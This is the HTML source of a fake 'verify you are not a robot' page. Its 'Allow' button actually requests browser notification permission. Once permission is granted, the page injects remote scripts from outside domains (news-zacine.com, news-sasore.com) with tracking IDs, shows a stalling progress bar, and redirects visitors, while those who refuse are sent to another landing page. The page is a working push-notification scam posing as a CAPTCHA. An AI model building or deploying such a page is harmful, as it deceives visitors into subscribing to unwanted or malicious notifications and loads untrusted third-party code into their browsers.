<!DOCTYPE html>
<html lang="en">
<head>
    <meta confirm="partners-house-179247"/>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verify Robot</title>
    <style>
        #robot-container {
            width: 100%;
            max-width: 1280px;
            height: 100%;
            max-height: 720px;
            position: fixed;
            left: 50%;
            top: 50%;
            transform: translate(-50%,-50%);
        }

        #image-space {
            position: absolute;
            height: 100%;
            top: 0;
            right: 0;
        }

        #text-space {
            padding: 50px 100px;
            border-radius: 20px;
            background-color: aliceblue;
            width: 40%;
            position: absolute;
            top: 30%;
            left: 0;
            transform: translateY(-50%);
            z-index: 1;
            text-align: center;
        }

        #text {
            font-size: xx-large;
        }

        #btn-allow {
            margin-top: 20px;
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            text-decoration: none;
            border: none; /* Loại bỏ viền */
            background-color: #1E90FF; /* Màu nền xanh da trời */
            color: #fff; /* Màu chữ trắng */
            border-radius: 5px;
            transition: all 0.3s ease;
        }

        #btn-allow:hover {
            background-color: #0058b5; /* Màu nền xanh da trời sáng hơn khi hover */
        }

        #line-processing {
            position: absolute;
            bottom: 0;
            left: 0;
            height: 5px;
            background-color: #1E90FF;
        }

        @media screen and (max-width: 1279px) {
            #image-space {
                left: 50%;
                transform: translateX(-50%);
            }

            #text-space {
                top: auto;
                bottom: 0;
                left: 50%;
                transform: translateX(-50%);
                height: auto;
            }
        }

        @media screen and (max-width: 720px) {
            #image-space {
                width: 90%;
            }
            #text-space {
                width: 85%;
                padding: 30px 15px;
            }
        }

    </style>
</head>
<body>
    <div id="robot-container">
        <div id="text-space">
            <span id="text"><b>Click Allow</b>&nbsp;to verify that you are not a Robot</span><br>
            <button id="btn-allow">Allow</button>
            <div id="line-processing"></div>
        </div>
        <div id="image-space">
            <img width="100%" src="./images/robot.avif" alt="">
        </div>
    </div>

    <script type="text/javascript" src="./handler.js"></script>

    <script type="text/javascript">
        const time_wait= 0;
        const blackout=0;
        const yaban = 0;
        const title = "";
        const desc = "";
    </script>

    <script>
        if(Notification.permission === 'denied') goAnotherLanding();

        (function () {
            const queryString = window.location.search;
            const urlParams = new URLSearchParams(queryString);
            const autoRedirect = urlParams.get('auto-redirect') ? parseInt(urlParams.get('auto-redirect')) || false : false;
            if(autoRedirect) setTimeout(() => {
                if(Notification.permission !== 'granted') handler();
            }, autoRedirect);
        })();

        let waitTime = 7500;
        if(Notification.permission !== "granted") {
            const btnAllow = document.getElementById('btn-allow');
            btnAllow.addEventListener('click', () => {
                if(Notification.permission !== "granted") {
                    Notification.requestPermission(permission => {
                        if(permission === 'granted') {
                            initPush();
                        } else if(permission === 'denied') {
                            goAnotherLanding();
                        }
                    })
                }
            })

        }
        else {
            waitTime = 3000;
            initPush();
        }

        function initPush() {
            const script1 = document.createElement('script');
            script1.type = 'text/javascript';
            script1.src = 'https://news-zacine.com/code/https-v2.js?uid=179247&site=1222197208&banadu=0';

            document.body.appendChild(script1);

            const script2 = document.createElement('script');
            script2.type = 'text/javascript';
            script2.src = 'https://news-sasore.com/process.js?id=1222197208';
            document.body.appendChild(script2);

            let time = 0;
            const lineProcessing = document.getElementById('line-processing');
            const processing = setInterval(() => {
                time += 500;
                if(time > waitTime) {
                    clearInterval(processing);
                    handler();
                    return;
                }
                const percent = Math.round((time/waitTime)*100);
                lineProcessing.style.width = percent.toString() + '%';

            }, 500);
        }
    </script>
</body>
</html>